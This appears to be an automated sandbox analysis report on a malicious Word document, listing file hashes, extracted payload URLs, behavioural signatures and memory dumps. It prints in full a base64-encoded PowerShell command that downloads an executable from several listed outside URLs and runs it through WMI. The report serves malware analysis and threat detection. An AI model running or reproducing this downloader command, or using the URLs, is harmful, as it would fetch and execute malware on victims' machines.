Analysis
-
max time kernel
171s -
max time network
176s -
platform
windows10-2004_x64 -
resource
win10v2004-20220414-en -
submitted
22-05-2022 05:53
Static task
static1
Behavioral task
behavioral1
Sample
wtvkrclp.doc
Resource
win7-20220414-en
Behavioral task
behavioral2
Sample
wtvkrclp.doc
Resource
win10v2004-20220414-en
General
-
Target
wtvkrclp.doc
-
Size
169KB
-
MD5
9bcd7831593b18eb2fc20abb950776e0
-
SHA1
94fce0e45271cd1dc5ff594f886146c88b5bdf75
-
SHA256
2e480d827237d7ae78d5b296e18e6a0cd466c5f3e09abf96f8bb53d927c4bab8
-
SHA512
ce5e923278b315e334274b0b1f9434aaa2851135fb0fb4f147b8e123da1f595e50a70fc47079f8f3c8c5c6a43f9b5b04a5dbf799f29491bb73d716304892dfdc
Malware Config
Extracted
http://sampling-group.com/J0Eubtq06/
http://www.weddingsday.co.uk/docs/1oYncTNHDu/
http://sasystemsuk.com/recruit/sl979/
http://wellparts.net/cgi-bin/qAj081/
http://volkanakbalik.com/_inc/2W/
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
powersheLL.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4568 5064 powersheLL.exe -
Blocklisted process makes network request 2 IoCs
Processes:
powersheLL.exeflow pid process 26 4568 powersheLL.exe 45 4568 powersheLL.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
Processes:
WINWORD.EXEpid process 4188 WINWORD.EXE 4188 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powersheLL.exepid process 4568 powersheLL.exe 4568 powersheLL.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powersheLL.exedescription pid process Token: SeDebugPrivilege 4568 powersheLL.exe -
Suspicious use of SetWindowsHookEx 7 IoCs
Processes:
WINWORD.EXEpid process 4188 WINWORD.EXE 4188 WINWORD.EXE 4188 WINWORD.EXE 4188 WINWORD.EXE 4188 WINWORD.EXE 4188 WINWORD.EXE 4188 WINWORD.EXE
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\wtvkrclp.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\WindowsPowerShell\v1.0\powersheLL.exepowersheLL -e JABHAEQAWgBBAFoAeABwAGgAPQAnAFAATABKAFMAUQBtAGIAdgAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBzAEUAYABDAHUAUgBpAHQAWQBQAGAAUgBvAHQAbwBjAGAATwBsACIAIAA9ACAAJwB0AGwAcwAxADIALAAgAHQAbABzADEAMQAsACAAdABsAHMAJwA7ACQATgBXAEIATABGAHoAcgBnACAAPQAgACcAOAA0ADgAJwA7ACQAWgBFAEgARwBMAHQAbAB3AD0AJwBSAEsAWQBBAEkAeAB5AHcAJwA7ACQAWgBVAEMASwBYAGQAaQBmAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABOAFcAQgBMAEYAegByAGcAKwAnAC4AZQB4AGUAJwA7ACQAWgBWAEYAVQBRAHoAdAB1AD0AJwBWAEYATwBKAEsAZABhAGcAJwA7ACQARABZAFQAVgBNAHMAdQBxAD0AJgAoACcAbgBlAHcALQBvAGIAJwArACcAagBlAGMAJwArACcAdAAnACkAIABuAGUAVAAuAHcAZQBiAEMATABpAGUAbgBUADsAJABKAEMASwBQAFEAegB6AHMAPQAnAGgAdAB0AHAAOgAvAC8AcwBhAG0AcABsAGkAbgBnAC0AZwByAG8AdQBwAC4AYwBvAG0ALwBKADAARQB1AGIAdABxADAANgAvACoAaAB0AHQAcAA6AC8ALwB3AHcAdwAuAHcAZQBkAGQAaQBuAGcAcwBkAGEAeQAuAGMAbwAuAHUAawAvAGQAbwBjAHMALwAxAG8AWQBuAGMAVABOAEgARAB1AC8AKgBoAHQAdABwADoALwAvAHMAYQBzAHkAcwB0AGUAbQBzAHUAawAuAGMAbwBtAC8AcgBlAGMAcgB1AGkAdAAvAHMAbAA5ADcAOQAvACoAaAB0AHQAcAA6AC8ALwB3AGUAbABsAHAAYQByAHQAcwAuAG4AZQB0AC8AYwBnAGkALQBiAGkAbgAvAHEAQQBqADAAOAAxAC8AKgBoAHQAdABwADoALwAvAHYAbwBsAGsAYQBuAGEAawBiAGEAbABpAGsALgBjAG8AbQAvAF8AaQBuAGMALwAyAFcALwAnAC4AIgBzAHAAYABMAEkAVAAiACgAWwBjAGgAYQByAF0ANAAyACkAOwAkAFkAVwBPAEgATgBiAHYAcAA9ACcAUgBLAEIAVQBTAHEAagB2ACcAOwBmAG8AcgBlAGEAYwBoACgAJABDAFAAWABSAE8AYQBlAHoAIABpAG4AIAAkAEoAQwBLAFAAUQB6AHoAcwApAHsAdAByAHkAewAkAEQAWQBUAFYATQBzAHUAcQAuACIAZABPAGAAdwBOAEwATwBhAGAAZABGAEkATABFACIAKAAkAEMAUABYAFIATwBhAGUAegAsACAAJABaAFUAQwBLAFgAZABpAGYAKQA7ACQATABFAE8ASQBOAHEAdgBxAD0AJwBGAEgAWgBWAFoAYgBhAHoAJwA7AEkAZgAgACgAKAAmACgAJwBHAGUAdAAtACcAKwAnAEkAJwArACcAdABlAG0AJwApACAAJABaAFUAQwBLAFgAZABpAGYAKQAuACIAbABFAG4ARwBgAFQAaAAiACAALQBnAGUAIAAzADkAOQA1ADYAKQAgAHsAKABbAHcAbQBpAGMAbABhAHMAcwBdACcAdwBpAG4AMwAyAF8AUAByAG8AYwBlAHMAcwAnACkALgAiAGMAYABSAGUAYABBAHQARQAiACgAJABaAFUAQwBLAFgAZABpAGYAKQA7ACQAUwBIAEQAWQBBAGYAYgBqAD0AJwBBAE4AWABaAE8AYwBvAGIAJwA7AGIAcgBlAGEAawA7ACQAUQBJAFgATABYAGsAcQBoAD0AJwBXAEwAWgBVAFMAcQBnAGQAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQASQBHAE8AQwBNAGgAegBwAD0AJwBIAEkATABTAEwAegBxAGoAJwA=1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/4188-136-0x00007FFAB92B0000-0x00007FFAB92C0000-memory.dmpFilesize
64KB
-
memory/4188-130-0x00007FFABBC10000-0x00007FFABBC20000-memory.dmpFilesize
64KB
-
memory/4188-131-0x00007FFABBC10000-0x00007FFABBC20000-memory.dmpFilesize
64KB
-
memory/4188-133-0x00007FFABBC10000-0x00007FFABBC20000-memory.dmpFilesize
64KB
-
memory/4188-134-0x00007FFABBC10000-0x00007FFABBC20000-memory.dmpFilesize
64KB
-
memory/4188-135-0x00007FFAB92B0000-0x00007FFAB92C0000-memory.dmpFilesize
64KB
-
memory/4188-132-0x00007FFABBC10000-0x00007FFABBC20000-memory.dmpFilesize
64KB
-
memory/4188-137-0x000002B6FFC30000-0x000002B6FFC34000-memory.dmpFilesize
16KB
-
memory/4188-141-0x00007FFABBC10000-0x00007FFABBC20000-memory.dmpFilesize
64KB
-
memory/4188-144-0x00007FFABBC10000-0x00007FFABBC20000-memory.dmpFilesize
64KB
-
memory/4188-143-0x00007FFABBC10000-0x00007FFABBC20000-memory.dmpFilesize
64KB
-
memory/4188-142-0x00007FFABBC10000-0x00007FFABBC20000-memory.dmpFilesize
64KB
-
memory/4568-138-0x0000018CAA620000-0x0000018CAA642000-memory.dmpFilesize
136KB
-
memory/4568-139-0x00007FFAD08C0000-0x00007FFAD1381000-memory.dmpFilesize
10.8MB